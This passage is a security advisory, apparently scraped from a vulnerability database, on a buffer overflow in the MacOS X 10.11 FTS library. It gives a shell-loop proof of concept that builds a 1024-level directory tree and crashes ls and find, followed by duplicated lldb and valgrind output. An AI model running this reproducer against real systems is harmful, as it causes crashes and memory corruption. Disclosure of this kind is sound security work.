\n/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B: \ntotal 0 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 . \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 .. \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 B \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X1 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X2 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X3 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X4 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X5 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X6 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X7 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X8 \n \n./B/B/B/B/B/B/B/B/..../B/B: \nProcess 987 stopped \n* thread #1: tid = 0x2924, 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0xfeb66c00) \nframe #0: 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18 \nlibsystem_c.dylib`strlen: \n-> 0x7fff97ab6d32 <+18>: pcmpeqb (%rdi), %xmm0 \n0x7fff97ab6d36 <+22>: pmovmskb %xmm0, %esi \n0x7fff97ab6d3a <+26>: andq $0xf, %rcx \n0x7fff97ab6d3e <+30>: orq $-0x1, %rax \n \n(lldb) x/x $rdi \nerror: memory read failed for 0xfeb66c00 \n(lldb) register read \nGeneral Purpose Registers: \nrax = 0x00000000ffffffff \nrbx = 0x00000000ffffffff \nrcx = 0x00000000feb66c08 \nrdx = 0x00000000feb66c08 \nrdi = 0x00000000feb66c00 \nrsi = 0x00007fff97afbb4d libsystem_c.dylib`__vfprintf + 2742 \nrbp = 0x00007fff5fbfe710 \nrsp = 0x00007fff5fbfe710 \n... \nrip = 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18 \n... \n(lldb) bt \n* thread #1: tid = 0x2924, 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0xfeb66c00) \n* frame #0: 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18 \nframe #1: 0x00007fff97afc6e8 libsystem_c.dylib`__vfprintf + 5713 \nframe #2: 0x00007fff97b2535d libsystem_c.dylib`__v2printf + 669 \nframe #3: 0x00007fff97b095a9 libsystem_c.dylib`_vsnprintf + 596 \nframe #4: 0x00007fff97b0965e libsystem_c.dylib`vsnprintf + 80 \nframe #5: 0x00007fff97b3acc0 libsystem_c.dylib`__snprintf_chk + 128 \nframe #6: 0x00000001000024a8 ls`___lldb_unnamed_function16$$ls + 1564 \nframe #7: 0x0000000100001cfd ls`___lldb_unnamed_function14$$ls + 421 \nframe #8: 0x0000000100001a70 ls`___lldb_unnamed_function13$$ls + 2300 \nframe #9: 0x00007fff93cdb5ad libdyld.dylib`start + 1 \n \n=== Time for Valgrind ============= \n \nB/B/B/B/B/../B: \ntotal 0 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 . \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 .. \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 B \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X1 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X2 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X3 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X4 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X5 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X6 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X7 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X8 \n \n./B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B: \ntotal 0 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 . \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 .. \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 B \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X1 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X2 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X3 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X4 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X5 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X6 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X7 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X8 \n==1009== Invalid write of size 1 \n==1009== at 0x1000126C3: _platform_memmove$VARIANT$Ivybridge (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) \n==1009== by 0x1002E034B: fts_read$INODE64 (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x100001DAD: ??? (in /bin/ls) \n==1009== by 0x100001A6F: ??? (in /bin/ls) \n==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib) \n==1009== by 0x1: ??? \n==1009== by 0x104809C8A: ??? \n==1009== by 0x104809C8D: ??? \n==1009== Address 0x100ae9880 is 0 bytes after a block of size 1,280 alloc'd \n==1009== at 0x10000FEBB: malloc (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) \n==1009== by 0x1002DFAB7: __fts_open (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x100001B92: ??? (in /bin/ls) \n==1009== by 0x100001A6F: ??? (in /bin/ls) \n==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib) \n==1009== by 0x1: ??? \n==1009== by 0x104809C8A: ??? \n==1009== by 0x104809C8D: ??? \n==1009== \n \n./B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B: \n==1009== Invalid read of size 1 \n==1009== at 0x1000116BF: strlen (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) \n==1009== by 0x1003226E7: __vfprintf (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x10034B35C: __v2printf (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x10032F5A8: _vsnprintf (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x10032F65D: vsnprintf (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x100360CBF: __snprintf_chk (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x1000024A7: ??? (in /bin/ls) \n==1009== by 0x100001CFC: ??? (in /bin/ls) \n==1009== by 0x100001A6F: ??? (in /bin/ls) \n==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib) \n==1009== by 0x1: ??? \n==1009== by 0x104809C8A: ??? \n==1009== Address 0x102d20318 is not stack'd, malloc'd or (recently) free'd \n==1009== \n==1009== \n==1009== Process terminating with default action of signal 11 (SIGSEGV) \n==1009== Access not within mapped region at address 0x102D20318 \n==1009== at 0x1000116BF: strlen (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) \n==1009== by 0x1003226E7: __vfprintf (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x10034B35C: __v2printf (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x10032F5A8: _vsnprintf (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x10032F65D: vsnprintf (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x100360CBF: __snprintf_chk (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x1000024A7: ??? (in /bin/ls) \n==1009== by 0x100001CFC: ??? (in /bin/ls) \n==1009== by 0x100001A6F: ??? (in /bin/ls) \n==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib) \n==1009== by 0x1: ??? \n==1009== by 0x104809C8A: ??? \n==1009== If you believe this happened as a result of a stack \n==1009== overflow in your program's main thread (unlikely but \n==1009== possible), you can try to increase the size of the \n==1009== main thread stack using the --main-stacksize= flag. \n==1009== The main thread stack size used in this run was 8388608. \n==1009== \n==1009== HEAP SUMMARY: \n==1009== in use at exit: 1,671,999 bytes in 6,025 blocks \n==1009== total heap usage: 91,521 allocs, 85,496 frees, 9,706,918 bytes allocated \n==1009== \n==1009== LEAK SUMMARY: \n==1009== definitely lost: 519 bytes in 6 blocks \n==1009== indirectly lost: 104 bytes in 6 blocks \n==1009== possibly lost: 0 bytes in 0 blocks \n==1009== still reachable: 1,645,151 bytes in 5,819 blocks \n==1009== suppressed: 26,225 bytes in 194 blocks \n==1009== Rerun with --leak-check=full to see details of leaked memory \n==1009== \n==1009== For counts of detected and suppressed errors, rerun with: -v \n==1009== ERROR SUMMARY: 2 errors from 2 contexts (suppressed: 0 from 0) \nSegmentation fault: 11 \nMacMini:SCANME cxsecurity$ \n \n \nIt looks like a buffer overflow in memmove(). Code \n \nhttp://www.opensource.apple.com/source/Libc/Libc-1044.40.1/gen/fts.c \n \n \nThe same issue for 'find' which may be used in cron scripts like \n \n \n./periodic/daily/110.clean-tmps: find -dx . -fstype local -type f $args -delete $print \n./periodic/daily/110.clean-tmps: find -dx . -fstype local ! -name . -type d $dargs -delete $print \n./periodic/daily/140.clean-rwho: rc=$(find . ! -name . -mtime +$daily_clean_rwho_days \n./periodic/daily/199.clean-fax: find . -type f -name '[0-9]*.[0-9][0-9][0-9]' -mtime +7 -delete >/dev/null 2>&1; \n \n \nLet's see valgrind output. \n \n \nMacMini:SCANME cxsecurity$ valgrind find . -name \"R\" \n==1055== Memcheck, a memory error detector \n==1055== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al. \n==1055== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info \n==1055== Command: find . -name R \n==1055== \nfind: ./.Trashes: Permission denied \n==1055== Invalid write of size 2 \n==1055== at 0x100015690: _platform_memmove$VARIANT$Ivybridge (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) \n==1055== by 0x1001B134B: fts_read$INODE64 (in /usr/lib/system/libsystem_c.dylib) \n==1055== by 0x1000013FA: ??? (in /usr/bin/find) \n==1055== by 0x1000052AD: ??? (in /usr/bin/find) \n==1055== by 0x1001525AC: start (in /usr/lib/system/libdyld.dylib) \n==1055== by 0x3: ??? \n==1055== by 0x10480CC7F: ??? \n==1055== Address 0x10120b944 is 2,052 bytes inside a block of size 2,053 alloc'd \n==1055== at 0x100013920: realloc (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) \n==1055== by 0x1001B1767: fts_build (in /usr/lib/system/libsystem_c.dylib) \n==1055== by 0x1001B11DA: fts_read$INODE64 (in /usr/lib/system/libsystem_c.dylib) \n==1055== by 0x1000013FA: ??? (in /usr/bin/find) \n==1055== by 0x1000052AD: ??? (in /usr/bin/find) \n==1055== by 0x1001525AC: start (in /usr/lib/system/libdyld.dylib) \n==1055== by 0x3: ??? \n==1055== by 0x10480CC7F: ??? \n... \n \nInvalid memory write without crashing. \n \n \nBTW: \nMany vendors of antiviruses for MACOS X seems to be blind for malicus software above 512 level of directory. Eg. Eset32, Kaspersky etc. \n \n====== References =================================== \nhttps://cxsecurity.com/issue/WLB-2014040027 \nhttps://cxsecurity.com/cveshow/CVE-2014-4433/ \nhttps://cxsecurity.com/cveshow/CVE-2014-4434/ \nhttps://cxsecurity.com/issue/WLB-2013110059 \nhttps://cxsecurity.com/cveshow/CVE-2013-6799/ \nhttps://cxsecurity.com/issue/WLB-2010040284 \nhttps://cxsecurity.com/cveshow/CVE-2010-0105/ \nhttps://cxsecurity.com/issue/WLB-2005090063 \n \n \n====== Thanks =================================== \nKacper and Smash_ from DEVILTEAM for technical support. \n \n \n====== Credit =================================== \nMaksymilian Arciemowicz from cxsecurity.com \n \nhttp://cxsecurity.com/ \nhttp://cert.cx/ \nhttp://cifrex.org/ \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/134710/WLB-2015100149.txt", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:22:22", "bulletinFamily": "exploit", "description": "", "modified": "2015-10-26T00:00:00", "published": "2015-10-26T00:00:00", "href": "https://packetstormsecurity.com/files/134090/MacOS-X-10.11-FTS-Buffer-Overflow.html", "id": "PACKETSTORM:134090", "type": "packetstorm", "title": "MacOS X 10.11 FTS Buffer Overflow", "sourceData": "`MacOS X 10.11 FTS Deep structure of the file system Buffer Overflow \nCredit: Maksymilian Arciemowicz ( CXSECURITY ) \nWebsite: \nhttp://cxsecurity.com/ \nhttp://cert.cx/ \n \n \nAffected software: \n- Commands such as: ls, find, rm \n- probably more \n \nApple file system suffer for a issue recognised in FTS library. The main problem occur when we create deep filesystem hierarchy. Unexpected behavior of many programs and invalid memory write seems really interesting. \n \nPoC: \nCreate an direcotry and perform the following actions: \n \n \n# for i in {1..1024}; do mkdir B && cd B; done \n.. \ncd: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory \n \n \nIf such error occur, don't panic script will continuing. When the script will finish, you need back to top of directory. E.g. \n \n \n# for i in {1..1024}; do cd .. ; done \n \n \nThen you can perform recursive 'ls' command. Let's run it ten times: \n \n \n# for i in {1..10}; do ls -laR > /dev/null; done \nls: B: No such file or directory \nls: B: No such file or directory \nls: B: No such file or directory \nls: B: No such file or directory \nls: B: No such file or directory \nls: B: No such file or directory \nls: B: No such file or directory \nls: B: No such file or directory \nSegmentation fault: 11 \nSegmentation fault: 11 \nSegmentation fault: 11 \nls: B: No such file or directory \nls: B: No such file or directory \nSegmentation fault: 11 \nls: B: No such file or directory \nls: B: No such file or directory \n \n \ncrash randometly. Let's see valgrind and lldb \n \n \nLLDB: \n.. \n/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B: \ntotal 0 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 . \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 .. \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 B \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X1 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X2 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X3 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X4 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X5 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X6 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X7 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X8 \n \n./B/B/B/B/B/B/B/B/..../B/B: \nProcess 987 stopped \n* thread #1: tid = 0x2924, 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0xfeb66c00) \nframe #0: 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18 \nlibsystem_c.dylib`strlen: \n-> 0x7fff97ab6d32 <+18>: pcmpeqb (%rdi), %xmm0 \n0x7fff97ab6d36 <+22>: pmovmskb %xmm0, %esi \n0x7fff97ab6d3a <+26>: andq $0xf, %rcx \n0x7fff97ab6d3e <+30>: orq $-0x1, %rax \n \n(lldb) x/x $rdi \nerror: memory read failed for 0xfeb66c00 \n(lldb) register read \nGeneral Purpose Registers: \nrax = 0x00000000ffffffff \nrbx = 0x00000000ffffffff \nrcx = 0x00000000feb66c08 \nrdx = 0x00000000feb66c08 \nrdi = 0x00000000feb66c00 \nrsi = 0x00007fff97afbb4d libsystem_c.dylib`__vfprintf + 2742 \nrbp = 0x00007fff5fbfe710 \nrsp = 0x00007fff5fbfe710 \n.. \nrip = 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18 \n.. \n(lldb) bt \n* thread #1: tid = 0x2924, 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0xfeb66c00) \n* frame #0: 0x00007fff97ab6d32 libsystem_c.dylib`strlen + 18 \nframe #1: 0x00007fff97afc6e8 libsystem_c.dylib`__vfprintf + 5713 \nframe #2: 0x00007fff97b2535d libsystem_c.dylib`__v2printf + 669 \nframe #3: 0x00007fff97b095a9 libsystem_c.dylib`_vsnprintf + 596 \nframe #4: 0x00007fff97b0965e libsystem_c.dylib`vsnprintf + 80 \nframe #5: 0x00007fff97b3acc0 libsystem_c.dylib`__snprintf_chk + 128 \nframe #6: 0x00000001000024a8 ls`___lldb_unnamed_function16$$ls + 1564 \nframe #7: 0x0000000100001cfd ls`___lldb_unnamed_function14$$ls + 421 \nframe #8: 0x0000000100001a70 ls`___lldb_unnamed_function13$$ls + 2300 \nframe #9: 0x00007fff93cdb5ad libdyld.dylib`start + 1 \n \n=== Time for Valgrind ============= \n \nB/B/B/B/B/../B: \ntotal 0 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 . \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 .. \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 B \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X1 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X2 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X3 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X4 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X5 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X6 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X7 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X8 \n \n./B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/ \nB/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B/B: \ntotal 0 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 . \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 .. \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 B \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X1 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X2 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X3 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X4 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X5 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X6 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X7 \ndrwxr-xr-x 11 cxsecurity staff 374 19 Oct 18:09 X8 \n==1009== Invalid write of size 1 \n==1009== at 0x1000126C3: _platform_memmove$VARIANT$Ivybridge (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) \n==1009== by 0x1002E034B: fts_read$INODE64 (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x100001DAD: ??? (in /bin/ls) \n==1009== by 0x100001A6F: ??? (in /bin/ls) \n==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib) \n==1009== by 0x1: ??? \n==1009== by 0x104809C8A: ??? \n==1009== by 0x104809C8D: ??? \n==1009== Address 0x100ae9880 is 0 bytes after a block of size 1,280 alloc'd \n==1009== at 0x10000FEBB: malloc (in /usr/local/Cellar/valgrind/3.11.0/lib/valgrind/vgpreload_memcheck-amd64-darwin.so) \n==1009== by 0x1002DFAB7: __fts_open (in /usr/lib/system/libsystem_c.dylib) \n==1009== by 0x100001B92: ??? (in /bin/ls) \n==1009== by 0x100001A6F: ??? (in /bin/ls) \n==1009== by 0x1002815AC: start (in /usr/lib/system/libdyld.dylib) \n==1009== by 0x1: ??? \n==1009== by 0x104809C8A: ??? \n==1009== by 0x104809C8D: ??? \n==1009== \n 